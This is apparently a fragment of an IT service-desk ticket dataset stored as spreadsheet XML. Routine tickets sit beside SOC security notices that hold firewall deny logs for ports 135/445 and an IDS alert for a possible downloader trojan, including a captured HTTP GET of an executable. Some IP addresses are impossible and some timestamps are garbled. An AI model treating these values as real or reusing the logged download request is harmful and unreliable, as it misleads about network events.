    <x v="19"/>
  </r>
  <r>
    <s v="security incidents - ( dsw #in33390850 ) : suspicious ms-rpc/ms-ds/netbios activity - ( HostName_1270 / 78.83.16.293 )"/>
    <s v="source ip : 78.83.16.293_x000a_system name : HostName_1270 - santiago,south amerirtca - backup exec server_x000a_user  name: uidgt olibercsu (olvidley)_x000a_location : santiago,south amerirtca_x000a_sep , sms status : see below_x000a_field sales user ( yes / no) : no_x000a_dsw event log: see below_x000a__x000a_**_x000a__x000a_content versions_x000a_fmxcnwpu tcwrdqboinition version: 08/08/2016 r19 _x000a_sequence: 179828 _x000a_host integrity content: not available _x000a_reputation settings: 03/02/2015 r5 _x000a_ap portal list: 11/11/2015 r22 _x000a_intrusion prevention signature: 08/08/2016 r11 _x000a_power eraser definitions: 10/28/2015 r36 _x000a_revocation content: 08/03/2016 r2 _x000a_eraser engine: 115.2.1.18 _x000a_sonar content: 07/18/2016 r1 _x000a_extended file attributes and signatures: 07/26/2016 r2 _x000a_symantec permitted applications list: 08/08/2016 r3 _x000a__x000a_=========================_x000a_incident overview_x000a_=========================_x000a_we have detected at least 225 occurrences of your firewall company-internal-asa.company.com-1/18.79.63.203 dropping traffic sourcing from HostName_1270/78.83.16.293 and destined to port 135 of one or more destination devices. this activity may indicate one of the following:_x000a_ 1. an infection on this host_x000a_ 2. a misconfigured firewall_x000a_ 3. a misconfigured host_x000a_ 4. port scan (authorized or unauthorized)_x000a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a__x000a_1) ticket only escalation for these alerts where the traffic was blocked (explicit notification via a medium priority ticket (no phone call))_x000a_2) automatically resolve these alerts where the traffic was blocked to the portal (no explicit notification but events will be available for reporting purposes in the portal)_x000a__x000a_sincerely,_x000a_dell secureworks soc_x000a__x000a_=========================_x000a_technical details_x000a_=========================_x000a_historically, there have been various worms/malware that have used ports 135, 137, 138, 139, and 445 to propagate. examples include:_x000a_-w32.blaster.worm/msblast/lovsan _x000a_-w32.welchia/nachi_x000a_-w32.reatle_x000a__x000a_port 135 - microsoft epmap (end point mapper), also known as dce/rpc locator service_x000a__x000a_port 137 - netbios netbios name service_x000a__x000a_port 138 - netbios netbios datagramdnty service_x000a__x000a_port 139 - netbios netbios session service_x000a__x000a_port 445 - microsoft-ds smb file sharing_x000a__x000a_additional information on these ports and best practices can be found at the following sites:_x000a__x000a__x000a__x000a__x000a__x000a__x000a__x000a__x000a_=========================_x000a_references_x000a_=========================_x000a__x000a__x000a__x000a__x000a__x000a__x000a__x000a__x000a__x000a_=========================_x000a_event data_x000a_=========================_x000a_related events: _x000a_____________________________________________________________________________x000a_event id: 27927493_x000a_event summary: internal outbreak for 135/tcp_x000a_log time: 2016-07-24 at 20:21:46_x000a_source ip: 78.83.16.293_x000a_source hostname: HostName_1270_x000a_destination hostname: _x000a_device ip: 18.79.63.203_x000a_device name: company-internal-asa.company.com-1_x000a_event extra data:_x000a_inspectorruleid = 186739_x000a_sherlockruleid = 537074_x000a_cvss = -1_x000a_ontologyid = 200020003203009144_x000a_srchostname = HostName_1270_x000a_eventtypeid = 200020003203009044_x000a_ctainstanceid = 0_x000a_foreseeglobalmodelassessmt = unknown_x000a_irreceivedtime = 1469392610163_x000a_foreseemalprobglobalmodel = 0.6162829_x000a_inspectoreventid = 018319585_x000a_eventtypepriority = 1_x000a_proto = tcp_x000a_dstport = 135_x000a_action = blocked_x000a_ileatdatacenter = true_x000a_foreseemaliciouscomment = globalmodelversion:794598;null or empty model found;_x000a_foreseeinternalip = 78.83.16.293_x000a_logtimestamp = 2570402817_x000a_agentid = 103611_x000a_foreseeconndirection = internal_x000a_srcassetofinterest = 4_x000a_srcport = 59908_x000a__x000a__x000a_occurrence count: 225_x000a_event count: 2_x000a__x000a_event detail:_x000a_jul 24 20:21:46 18.79.63.203 %asa-2-106001: inbound tcp connection denied from 78.83.16.293/59908 to 192.168.2.123/135 flags syn  on interface inside_x000a_jul 24 20:21:52 18.79.63.203 %asa-4-106023: deny tcp src inside:78.83.16.293/59920 dst outside:192.168.43.161/135 by access-group &quot;acl_inside&quot; [0xed29b7f9, 0x0]_x000a_jul 24 20:21:55 18.79.63.203 %asa-4-106023: deny tcp src inside:78.83.16.293/59927 dst outside:192.168.0.146/135 by access-group &quot;acl_inside&quot; [0xed29b7f9, 0x0]_x000a_jul 24 20:21:56 18.79.63.203 %asa-4-106023: deny tcp src inside:78.83.16.293/59929 dst outside:192.168.0.16/135 by access-group &quot;acl_inside&quot; [0xed29b7f9, 0x0]_x000a_jul 24 20:22:02 18.79.63.203 %asa-2-106001: inbound tcp connection denied from 78.83.16.293/59949 to 192.168.2.21/135 flags syn  on interface inside_x000a_jul 24 20:22:04 18.79.63.203 %asa-4-106023: deny tcp src inside:78.83.16.293/59952 dst outside:192.168.0.23/135 by access-group &quot;acl_inside&quot; [0xed29b7f9, 0x0]_x000a_jul 24 20:22:3sartlgeo lhqksbdx8.79.63.203 %asa-4-106023: deny tcp src inside:78.83.16.293/60005 dst outside:10.10.11.26/135 by access-group &quot;acl_inside&quot; [0xed29b7f9, 0x0]_x000a_jul 24 20:22:35 18.79.63.203 %asa-4-106023: deny tcp src inside:78.83.16.293/60011 dst outside:192.168.0.5/135 by access-group &quot;acl_inside&quot; [0xed29b7f9, 0x0]_x000a_jul 24 20:22:44 18.79.63.203 %asa-2-106001: inbound tcp connection denied from 78.83.16.293/60018 to 192.168.2.19/135 flags syn  on interface inside_x000a_jul 24 20:23:09 18.79.63.203 %asa-4-106023: deny tcp src inside:78.83.16.293/60066 dst outside:172.40.1.98/135 by access-group &quot;acl_inside&quot; [0xed29b7f9, 0x0]_x000a_jul 24 20:23:1sartlgeo lhqksbdx8.79.63.203 %asa-4-106023: deny tcp src inside:78.83.16.293/60070 dst outside:192.168.0.39/135 by access-group &quot;acl_inside&quot; [0xed29b7f9, 0x0]_x000a_jul 24 20:23:15 18.79.63.203 %asa-2-106001: inbound tcp connection denied from 78.83.16.293/60083 to 192.168.2.150/135 flags syn  on interface inside_x000a_jul 24 20:23:16 18.79.63.203 %asa-4-106023: deny tcp src inside:78.83.16.293/60086 dst outside:192.168.178.139/135 by access-group &quot;acl_inside&quot; [0xed29b7f9, 0x0]_x000a_jul 24 20:23:19 18.79.63.203 %asa-4-106023: deny tcp src inside:78.83.16.293/60095 dst outside:192.168.0.101/135 by access-group &quot;acl_inside&quot; [0xed29b7f9, 0x0]_x000a_jul 24 20:23:26 18.79.63.203 %asa-4-106023: deny tcp src inside:78.83.16.293/60116 dst outside:192.168.0.2/135 by access-group &quot;acl_inside&quot; [0xed29b7f9, 0x0]_x000a_jul 24 20:23:26 18.79.63.203 %asa-4-106023: deny tcp src inside:78.83.16.293/60117 dst outside:192.168.0.22/135 by access-group &quot;acl_inside&quot; [0xed29b7f9, 0x0]_x000a__x000a__x000a__x000a_____________________________________________________________________________x000a_event id: 27927405_x000a_event summary: internal outbreak for 445/tcp_x000a_log time: 2016-07-24 at 20:21:46_x000a_source ip: 78.83.16.293_x000a_source hostname: HostName_1270_x000a_destination hostname: _x000a_device ip: 18.79.63.203_x000a_device name: company-internal-asa.company.com-1_x000a_event extra data:_x000a_inspectorruleid = 186739_x000a_sherlockruleid = 537074_x000a_cvss = -1_x000a_ontologyid = 200020003203009144_x000a_srchostname = HostName_1270_x000a_eventtypeid = 200020003203009044_x000a_ctainstanceid = 0_x000a_foreseeglobalmodelassessmt = unknown_x000a_irreceivedtime = 1469392610163_x000a_foreseemalprobglobalmodel = 0.6162829_x000a_inspectoreventid = 018319585_x000a_eventtypepriority = 1_x000a_proto = tcp_x000a_dstport = 135_x000a_action = blocked_x000a_ileatdatacenter = true_x000a_foreseemaliciouscomment = globalmodelversion:794598;null or empty model found;_x000a_foreseeinternalip = 78.83.16.293_x000a_logtimestamp = 2570402817_x000a_agentid = 103611_x000a_foreseeconndirection = internal_x000a_srcassetofinterest = 4_x000a_srcport = 59908_x000a__x000a__x000a_occurrence count: 225_x000a_event count: 2_x000a__x000a_event detail:_x000a_jul 24 20:21:53 18.79.63.203 %asa-4-106023: deny tcp src inside:78.83.16.293/59925 dst outside:192.168.43.161/445 by access-group &quot;acl_inside&quot; [0xac2286bc, 0x0]_x000a_jul 24 20:21:57 18.79.63.203 %asa-4-106023: deny tcp src inside:78.83.16.293/59931 dst outside:192.168.0.146/445 by access-group &quot;acl_inside&quot; [0xac2286bc, 0x0]_x000a_jul 24 20:21:58 18.79.63.203 %asa-4-106023: deny tcp src inside:78.83.16.293/59936 dst outside:192.168.0.16/445 by access-group &quot;acl_inside&quot; [0xac2286bc, 0x0]_x000a_jul 24 20:22:06 18.79.63.203 %asa-4-106023: deny tcp src inside:78.83.16.293/59955 dst outside:192.168.0.23/445 by access-group &quot;acl_inside&quot; [0xac2286bc, 0x0]_x000a_jul 24 20:22:10 18.79.63.203 %asa-2-106001: inbound tcp connection denied from 78.83.16.293/59956 to 192.168.2.123/445 flags syn  on interface inside_x000a_jul 24 20:22:23 18.79.63.203 %asa-2-106001: inbound tcp connection denied from 78.83.16.293/59986 to 192.168.2.21/445 flags syn  on interface inside_x000a_jul 24 20:22:32 18.79.63.203 %asa-4-106023: deny tcp src inside:78.83.16.293/60008 dst outside:10.10.11.26/445 by access-group &quot;acl_inside&quot; [0xac2286bc, 0x0]_x000a_jul 24 20:22:37 18.79.63.203 %asa-4-106023: deny tcp src inside:78.83.16.293/60012 dst outside:192.168.0.5/445 by access-group &quot;acl_inside&quot; [0xac2286bc, 0x0]_x000a_jul 24 20:23:05 18.79.63.203 %asa-2-106001: inbound tcp connection denied from 78.83.16.293/60056 to 192.168.2.19/445 flags syn  on interface inside_x000a_jul 24 20:23:1sartlgeo lhqksbdx8.79.63.203 %asa-4-106023: deny tcp src inside:78.83.16.293/60069 dst outside:172.40.1.98/445 by access-group &quot;acl_inside&quot; [0xac2286bc, 0x0]_x000a_jul 24 20:23:12 18.79.63.203 %asa-4-106023: deny tcp src inside:78.83.16.293/60074 dst outside:192.168.0.39/445 by access-group &quot;acl_inside&quot; [0xac2286bc, 0x0]_x000a_jul 24 20:23:18 18.79.63.203 %asa-4-106023: deny tcp src inside:78.83.16.293/60090 dst outside:192.168.178.139/445 by access-group &quot;acl_inside&quot; [0xac2286bc, 0x0]_x000a_jul 24 20:23:2sartlgeo lhqksbdx8.79.63.203 %asa-4-106023: deny tcp src inside:78.83.16.293/60099 dst outside:192.168.0.101/445 by access-group &quot;acl_inside&quot; [0xac2286bc, 0x0]_x000a_jul 24 20:23:27 18.79.63.203 %asa-4-106023: deny tcp src inside:78.83.16.293/60122 dst outside:192.168.0.2/445 by access-group &quot;acl_inside&quot; [0xac2286bc, 0x0]_x000a_jul 24 20:23:27 18.79.63.203 %asa-4-106023: deny tcp src inside:78.83.16.293/60123 dst outside:192.168.0.22/445 by access-group &quot;acl_inside&quot; [0xac2286bc, 0x0]_x000a_jul 24 20:23:36 18.79.63.203 %asa-2-106001: inbound tcp connection denied from 78.83.16.293/60135 to 192.168.2.150/445 flags syn  on interface inside"/>
    <s v="ugyothfz ugrmkdhx"/>
    <x v="19"/>
  </r>
  <r>
    <s v="HostName_1132:epmsystem2.exe: wrong number of instances of process *epmsystem2.exe*, expected 2 - found 1"/>
    <s v="observing below alert in reporting_tool since 1:33 pm on 08/09 et. note that we have opened a ticket (inc1539097 )earlier for the same issue but looks like that time issue was resolved._x000a_epmsystem2.exe: wrong number of instances of process *epmsystem2.exe*, expected 2 - found 1"/>
    <s v="jloygrwh acvztedi"/>
    <x v="11"/>
  </r>
  <r>
    <s v="security incidents - ( dsw #in33390850 ) : suspicious ms-rpc/ms-ds/netbios activity - ( HostName_1270 / 78.83.16.293 )"/>
    <s v="source ip : 78.83.16.293_x000d__x000a_system name : HostName_1270 - santiago,south amerirtca - backup exec server_x000d__x000a_user  name: uidgt olibercsu (olvidley)_x000d__x000a_location : santiago,south amerirtca_x000d__x000a_sep , sms status : see below_x000d__x000a_field sales user ( yes / no) : no_x000d__x000a_dsw event log: see below_x000d__x000a__x000d__x000a_**_x000d__x000a__x000d__x000a_content versions_x000d__x000a_fmxcnwpu tcwrdqboinition version: 08/08/2016 r19 _x000d__x000a_sequence: 179828 _x000d__x000a_host integrity content: not available _x000d__x000a_reputation settings: 03/02/2015 r5 _x000d__x000a_ap portal list: 11/11/2015 r22 _x000d__x000a_intrusion prevention signature: 08/08/2016 r11 _x000d__x000a_power eraser definitions: 10/28/2015 r36 _x000d__x000a_revocation content: 08/03/2016 r2 _x000d__x000a_eraser engine: 115.2.1.18 _x000d__x000a_sonar content: 07/18/2016 r1 _x000d__x000a_extended file attributes and signatures: 07/26/2016 r2 _x000d__x000a_symantec permitted applications list: 08/08/2016 r3 _x000d__x000a__x000d__x000a_=========================_x000d__x000a_incident overview_x000d__x000a_=========================_x000d__x000a_we have detected at least 225 occurrences of your firewall company-internal-asa.company.com-1/18.79.63.203 dropping traffic sourcing from HostName_1270/78.83.16.293 and destined to port 135 of one or more destination devices. this activity may indicate one of the following:_x000d__x000a_ 1. an infection on this host_x000d__x000a_ 2. a misconfigured firewall_x000d__x000a_ 3. a misconfigured host_x000d__x000a_ 4. port scan (authorized or unauthorized)_x000d__x000a__x000d__x000a_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_x000d__x000a_1) ticket only escalation for these alerts where the traffic was blocked (explicit notification via a medium priority ticket (no phone call))_x000d__x000a_2) automatically resolve these alerts where the traffic was blocked to the portal (no explicit notification but events will be available for reporting purposes in the portal)_x000d__x000a__x000d__x000a_sincerely,_x000d__x000a_dell secureworks soc_x000d__x000a_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ring_x000d__x000a__x000d__x000a_additional information on these ports and best practices can be found at the following sites:_x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_=========================_x000d__x000a_references_x000d__x000a_=========================_x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_=========================_x000d__x000a_event data_x000d__x000a_=========================_x000d__x000a_related events: _x000d__x000a_____________________________________________________________________________x000d__x000a_event id: 27927493_x000d__x000a_event summary: internal outbreak for 135/tcp_x000d__x000a_log time: 2016-07-24 at 20:21:46_x000d__x000a_source ip: 78.83.16.293_x000d__x000a_source hostname: HostName_1270_x000d__x000a_destination hostname: _x000d__x000a_device ip: 18.79.63.203_x000d__x000a_device name: company-internal-asa.company.com-1_x000d__x000a_event extra data:_x000d__x000a_inspectorruleid = 186739_x000d__x000a_sherlockruleid = 537074_x000d__x000a_cvss = -1_x000d__x000a_ontologyid = 200020003203009144_x000d__x000a_srchostname = HostName_1270_x000d__x000a_eventtypeid = 200020003203009044_x000d__x000a_ctainstanceid = 0_x000d__x000a_foreseeglobalmodelassessmt = unknown_x000d__x000a_irreceivedtime = 1469392610163_x000d__x000a_foreseemalprobglobalmodel = 0.6162829_x000d__x000a_inspectoreventid = 018319585_x000d__x000a_eventtypepriority = 1_x000d__x000a_proto = tcp_x000d__x000a_dstport = 135_x000d__x000a_action = blocked_x000d__x000a_ileatdatacenter = true_x000d__x000a_foreseemaliciouscomment = globalmodelversion:794598;null or empty model found;_x000d__x000a_foreseeinternalip = 78.83.16.293_x000d__x000a_logtimestamp = 2570402817_x000d__x000a_agentid = 103611_x000d__x000a_foreseeconndirection = internal_x000d__x000a_srcassetofinterest = 4_x000d__x000a_srcport = 59908_x000d__x000a__x000d__x000a__x000d__x000a_occurrence count: 225_x000d__x000a_event count: 2_x000d__x000a__x000d__x000a_event detail:_x000d__x000a_jul 24 20:21:46 18.79.63.203 %asa-2-106001: inbound tcp connection denied from 78.83.16.293/59908 to 192.168.2.123/135 flags syn  on interface inside_x000d__x000a_jul 24 20:21:52 18.79.63.203 %asa-4-106023: deny tcp src inside:78.83.16.293/59920 dst outside:192.168.43.161/135 by access-group &quot;acl_inside&quot; [0xed29b7f9, 0x0]_x000d__x000a_jul 24 20:21:55 18.79.63.203 %asa-4-106023: deny tcp src inside:78.83.16.293/59927 dst outside:192.168.0.146/135 by access-group &quot;acl_inside&quot; [0xed29b7f9, 0x0]_x000d__x000a_jul 24 20:21:56 18.79.63.203 %asa-4-106023: deny tcp src inside:78.83.16.293/59929 dst outside:192.168.0.16/135 by access-group &quot;acl_inside&quot; [0xed29b7f9, 0x0]_x000d__x000a_jul 24 20:22:02 18.79.63.203 %asa-2-106001: inbound tcp connection denied from 78.83.16.293/59949 to 192.168.2.21/135 flags syn  on interface inside_x000d__x000a_jul 24 20:22:04 18.79.63.203 %asa-4-106023: deny tcp src inside:78.83.16.293/59952 dst outside:192.168.0.23/135 by access-group &quot;acl_inside&quot; [0xed29b7f9, 0x0]_x000d__x000a_jul 24 20:22:3sartlgeo lhqksbdx8.79.63.203 %asa-4-106023: deny tcp src inside:78.83.16.293/60005 dst outside:10.10.11.26/135 by access-group &quot;acl_inside&quot; [0xed29b7f9, 0x0]_x000d__x000a_jul 24 20:22:35 18.79.63.203 %asa-4-106023: deny tcp src inside:78.83.16.293/60011 dst outside:192.168.0.5/135 by access-group &quot;acl_inside&quot; [0xed29b7f9, 0x0]_x000d__x000a_jul 24 20:22:44 18.79.63.203 %asa-2-106001: inbound tcp connection denied from 78.83.16.293/60018 to 192.168.2.19/135 flags syn  on interface inside_x000d__x000a_jul 24 20:23:09 18.79.63.203 %asa-4-106023: deny tcp src inside:78.83.16.293/60066 dst outside:172.40.1.98/135 by access-group &quot;acl_inside&quot; [0xed29b7f9, 0x0]_x000d__x000a_jul 24 20:23:1sartlgeo lhqksbdx8.79.63.203 %asa-4-106023: deny tcp src inside:78.83.16.293/60070 dst outside:192.168.0.39/135 by access-group &quot;acl_inside&quot; [0xed29b7f9, 0x0]_x000d__x000a_jul 24 20:23:15 18.79.63.203 %asa-2-106001: inbound tcp connection denied from 78.83.16.293/60083 to 192.168.2.150/135 flags syn  on interface inside_x000d__x000a_jul 24 20:23:16 18.79.63.203 %asa-4-106023: deny tcp src inside:78.83.16.293/60086 dst outside:192.168.178.139/135 by access-group &quot;acl_inside&quot; [0xed29b7f9, 0x0]_x000d__x000a_jul 24 20:23:19 18.79.63.203 %asa-4-106023: deny tcp src inside:78.83.16.293/60095 dst outside:192.168.0.101/135 by access-group &quot;acl_inside&quot; [0xed29b7f9, 0x0]_x000d__x000a_jul 24 20:23:26 18.79.63.203 %asa-4-106023: deny tcp src inside:78.83.16.293/60116 dst outside:192.168.0.2/135 by access-group &quot;acl_inside&quot; [0xed29b7f9, 0x0]_x000d__x000a_jul 24 20:23:26 18.79.63.203 %asa-4-106023: deny tcp src inside:78.83.16.293/60117 dst outside:192.168.0.22/135 by access-group &quot;acl_inside&quot; [0xed29b7f9, 0x0]_x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_____________________________________________________________________________x000d__x000a_event id: 27927405_x000d__x000a_event summary: internal outbreak for 445/tcp_x000d__x000a_log time: 2016-07-24 at 20:21:46_x000d__x000a_source ip: 78.83.16.293_x000d__x000a_source hostname: HostName_1270_x000d__x000a_destination hostname: _x000d__x000a_device ip: 18.79.63.203_x000d__x000a_device name: company-internal-asa.company.com-1_x000d__x000a_event extra data:_x000d__x000a_inspectorruleid = 186739_x000d__x000a_sherlockruleid = 537074_x000d__x000a_cvss = -1_x000d__x000a_ontologyid = 200020003203009144_x000d__x000a_srchostname = HostName_1270_x000d__x000a_eventtypeid = 200020003203009044_x000d__x000a_ctainstanceid = 0_x000d__x000a_foreseeglobalmodelassessmt = unknown_x000d__x000a_irreceivedtime = 1469392610163_x000d__x000a_foreseemalprobglobalmodel = 0.6162829_x000d__x000a_inspectoreventid = 018319585_x000d__x000a_eventtypepriority = 1_x000d__x000a_proto = tcp_x000d__x000a_dstport = 135_x000d__x000a_action = blocked_x000d__x000a_ileatdatacenter = true_x000d__x000a_foreseemaliciouscomment = globalmodelversion:794598;null or empty model found;_x000d__x000a_foreseeinternalip = 78.83.16.293_x000d__x000a_logtimestamp = 2570402817_x000d__x000a_agentid = 103611_x000d__x000a_foreseeconndirection = internal_x000d__x000a_srcassetofinterest = 4_x000d__x000a_srcport = 59908_x000d__x000a__x000d__x000a__x000d__x000a_occurrence count: 225_x000d__x000a_event count: 2_x000d__x000a__x000d__x000a_event detail:_x000d__x000a_jul 24 20:21:53 18.79.63.203 %asa-4-106023: deny tcp src inside:78.83.16.293/59925 dst outside:192.168.43.161/445 by access-group &quot;acl_inside&quot; [0xac2286bc, 0x0]_x000d__x000a_jul 24 20:21:57 18.79.63.203 %asa-4-106023: deny tcp src inside:78.83.16.293/59931 dst outside:192.168.0.146/445 by access-group &quot;acl_inside&quot; [0xac2286bc, 0x0]_x000d__x000a_jul 24 20:21:58 18.79.63.203 %asa-4-106023: deny tcp src inside:78.83.16.293/59936 dst outside:192.168.0.16/445 by access-group &quot;acl_inside&quot; [0xac2286bc, 0x0]_x000d__x000a_jul 24 20:22:06 18.79.63.203 %asa-4-106023: deny tcp src inside:78.83.16.293/59955 dst outside:192.168.0.23/445 by access-group &quot;acl_inside&quot; [0xac2286bc, 0x0]_x000d__x000a_jul 24 20:22:10 18.79.63.203 %asa-2-106001: inbound tcp connection denied from 78.83.16.293/59956 to 192.168.2.123/445 flags syn  on interface inside_x000d__x000a_jul 24 20:22:23 18.79.63.203 %asa-2-106001: inbound tcp connection denied from 78.83.16.293/59986 to 192.168.2.21/445 flags syn  on interface inside_x000d__x000a_jul 24 20:22:32 18.79.63.203 %asa-4-106023: deny tcp src inside:78.83.16.293/60008 dst outside:10.10.11.26/445 by access-group &quot;acl_inside&quot; [0xac2286bc, 0x0]_x000d__x000a_jul 24 20:22:37 18.79.63.203 %asa-4-106023: deny tcp src inside:78.83.16.293/60012 dst outside:192.168.0.5/445 by access-group &quot;acl_inside&quot; [0xac2286bc, 0x0]_x000d__x000a_jul 24 20:23:05 18.79.63.203 %asa-2-106001: inbound tcp connection denied from 78.83.16.293/60056 to 192.168.2.19/445 flags syn  on interface inside_x000d__x000a_jul 24 20:23:1sartlgeo lhqksbdx8.79.63.203 %asa-4-106023: deny tcp src inside:78.83.16.293/60069 dst outside:172.40.1.98/445 by access-group &quot;acl_inside&quot; [0xac2286bc, 0x0]_x000d__x000a_jul 24 20:23:12 18.79.63.203 %asa-4-106023: deny tcp src inside:78.83.16.293/60074 dst outside:192.168.0.39/445 by access-group &quot;acl_inside&quot; [0xac2286bc, 0x0]_x000d__x000a_jul 24 20:23:18 18.79.63.203 %asa-4-106023: deny tcp src inside:78.83.16.293/60090 dst outside:192.168.178.139/445 by access-group &quot;acl_inside&quot; [0xac2286bc, 0x0]_x000d__x000a_jul 24 20:23:2sartlgeo lhqksbdx8.79.63.203 %asa-4-106023: deny tcp src inside:78.83.16.293/60099 dst outside:192.168.0.101/445 by access-group &quot;acl_inside&quot; [0xac2286bc, 0x0]_x000d__x000a_jul 24 20:23:27 18.79.63.203 %asa-4-106023: deny tcp src inside:78.83.16.293/60122 dst outside:192.168.0.2/445 by access-group &quot;acl_inside&quot; [0xac2286bc, 0x0]_x000d__x000a_jul 24 20:23:27 18.79.63.203 %asa-4-106023: deny tcp src inside:78.83.16.293/60123 dst outside:192.168.0.22/445 by access-group &quot;acl_inside&quot; [0xac2286bc, 0x0]_x000d__x000a_jul 24 20:23:36 18.79.63.203 %asa-2-106001: inbound tcp connection denied from 78.83.16.293/60135 to 192.168.2.150/445 flags syn  on interface inside"/>
    <s v="ugyothfz ugrmkdhx"/>
    <x v="11"/>
  </r>
  <r>
    <s v="ess password reset"/>
    <s v="ess password reset"/>
    <s v="ariqehvd fhrpontd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="add printer prtqi2019 on HostName_1332   "/>
    <s v="add printer prtqi2019 on HostName_1332 with 32 and 64 bit drivers._x000d__x000a__x000d__x000a_model - hp laser jet 4350dn_x000d__x000a_dynamic ip address - _x000d__x000a_fqdn: prtqi2019_x000d__x000a_short name: SID_99_x000d__x000a_print server: \\HostName_1332"/>
    <s v="mfeyouli ndobtzpw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="security incidents - (in33536629) : possible trojan infection - host: 10.44.94.214"/>
    <s v="source ip :10.44.94.214_x000d__x000a_dest ip : 183.91.33.90_x000d__x000a_system name :apul8811851_x000d__x000a_user  name: jenfrgryui lu_x000d__x000a_location : singapore _x000d__x000a_sep , sms status :given below_x000d__x000a_field sales user ( yes / no) :  no_x000d__x000a_dsw event log: see below_x000d__x000a_--------------------------------------------------------------_x000d__x000a_=========================_x000d__x000a_ event details_x000d__x000a_=========================_x000d__x000a_event detail(s):_x000d__x000a__x000d__x000a_event_id 91201861:_x000d__x000a_[**] [1:21130977:10] 29866 vid22518 bare http get executable from ip address (possible downloader trojan) [**]_x000d__x000a_[classification: none] [priority: 2] [action: accept_passive] [impact_flag: 0] [impact: 0] [blocked: 2] [vlan: 0] [mpls label: 0] [pad2: 1]_x000d__x000a_[sensor id: 606873][event id: 722700][time: 2581693432.277667]_x000d__x000a_[xref =&gt; vid, 22518]_x000d__x000a_[src ip: 10.44.94.214][dst ip: 183.91.33.90][sport/itype: 64193][dport/icode: 80][proto: 6]_x000d__x000a_08/07/2016-15:05:21.277667 10.44.94.214:64193 -&gt; 183.91.33.90:80_x000d__x000a_tcp ttl:127 tos:0x0 id:13388 iplen:20 dgmlen:187 df_x000d__x000a_***ap*** seq: 0x64eb7c89 ack: 0xe070c15e win: 0x40b0 tcplen: 20_x000d__x000a_==pcap s==_x000d__x000a_=0c=00=00=001n=a7w=a3&lt;=04=00=bb=00=00=00=bb=00=00=00e=00=00=bb4l@=00=7f=06=859=0a,^=d6=b7[!z=fa=c1=00pd=eb|=89=e0p=c1^p=18@=b0=f7=c3=00=00get /pro.pz1.3dn.ie.sogou.com/sogou_explorer_5.1.7.15323_4492.exe http/1.1=0d=0aconnection: keep-alive=0d=0acache-control: no-cache=0d=0ahost: 183.91.33.90=0d=0a=0d=0a_x000d__x000a_==pcap e==_x000d__x000a__x000d__x000a__x000d__x000a_[ex http_uri 9: /pro.pz1.3dn.ie.sogou.com/sogou_explorer_5.1.7.15323_4492.exe]_x000d__x000a__x000d__x000a_[ex http_hostname 10: 183.91.33.90]_x000d__x000a__x000d__x000a_[o:security]_x000d__x000a__x000d__x000a_[correlation_data]_x000d__x000a_aug 7 10:38:22 46.45.62.5146 dhcpd[9675]: dhcpack on 10.44.94.214 to 40:04:b1:49:b3:75 (apul8811851) via eth2 relay 10.44.94.1 lease-duration 43200_x000d__x000a__x000d__x000a_refererproxycorrelationurl : null_x000d__x000a_ileatdatacenter : true_x000d__x000a_host : 183.91.33.90_x000d__x000a_cvss : -1_x000d__x000a_foreseeconndirection : outgoing_x000d__x000a_foreseeexternalip : 183.91.33.90_x000d__x000a_eventtypeid : 200020003203113798_x000d__x000a_netacuity_destination_isp : no.31 jin-rong street_x000d__x000a_srchostname : apul8811851_x000d__x000a_logtimestamp : 2581693432_x000d__x000a_urlhost : 183.91.33.90_x000d__x000a_proto : tcp_x000d__x000a_urlfullpath : /pro.pz1.3dn.ie.sogou.com/sogou_explorer_5.1.7.15323_4492.exe_x000d__x000a_unique_event_hash : 854336076_x000d__x000a_device_network_type : internal_x000d__x000a_srcport : 64193_x000d__x000a_urlcorrelation : /pro.pz1.3dn.ie.sogou.com/sogou_explorer_5.1.7.15323_4492.exe_x000d__x000a_dstip : 183.91.33.90_x000d__x000a_httpversion : http/1.1_x000d__x000a_url : 183.91.33.90/pro.pz1.3dn.ie.sogou.com/sogou_explorer_5.1.7.15323_4492.exe_x000d__x000a_vendorpriority : 2_x000d__x000a_httpmethod : get_x000d__x000a_ontologyid : 200020003203728796_x000d__x000a_vendorreference : vid, 22518_x000d__x000a_eventtypepriority : 3_x000d__x000a_devip : 80.68.49.4169_x000d__x000a_source_network_type : internal_x000d__x000a_inspectorruleid : 277082_x000d__x000a_lowercaseurlcorrelation : /pro.pz1.3dn.ie.sogou.com/sogou_explorer_5.1.7.15323_4492.exe_x000d__x000a_sherlockruleid : 690393_x000d__x000a_inlineaction : 2_x000d__x000a_urlpath : /pro.pz1.3dn.ie.sogou.com/sogou_explorer_5.1.7.15323_4492.exe_x000d__x000a_srcmacaddress : 40:04:b1:49:b3:75_x000d__x000a_inspectoreventid : 876354922_x000d__x000a_srcip : 10.44.94.214_x000d__x000a_globalproxycorrelationurl : explorer15_x000d__x000a_tcpflags : ***ap***_x000d__x000a_vendoreventid : 722700_x000d__x000a_foreseemaliciouscomment : null or empty model found;evaluationmodels-&gt;ngm:0.7587:0.0084;_x000d__x000a_foreseeinternalip : 10.44.94.214_x000d__x000a_foreseedstipgeo : hong kong,hkg_x000d__x000a_dstport : 80_x000d__x000a_device_id : 2559974_x000d__x000a_action : not blocked_x000d__x000a_event_summary : 29866 vid22518 bare http get executable from ip address (possible downloader trojan)_x000d__x000a_irreceivedtime : 1470582706714_x000d__x000a_vendorversion : 7_x000d__x000a_netacuity_destination_organization : apacnet hongkong region network_x000d__x000a_agentid : 102835_x000d__x000a_ctainstanceid : 0"/>
    <s v="gzhapcld fdigznbk"/>
    <x v="30"/>
  </r>
  <r>
    <s v="printer issue"/>
    <s v="_x000a_name:seghyurghei_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:mfeyouli.ndobtzpw@gmail.com_x000a_customer number:_x000a_telephone:_x000a_summary:trying to connect a printer"/>
    <s v="rbozivdq gmlhrtvp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="security incidents - ( dsw #in33407676 ) : traffic from sinkhole domain to ( lpawx210968sf / 61.01.52.02617 )"/>
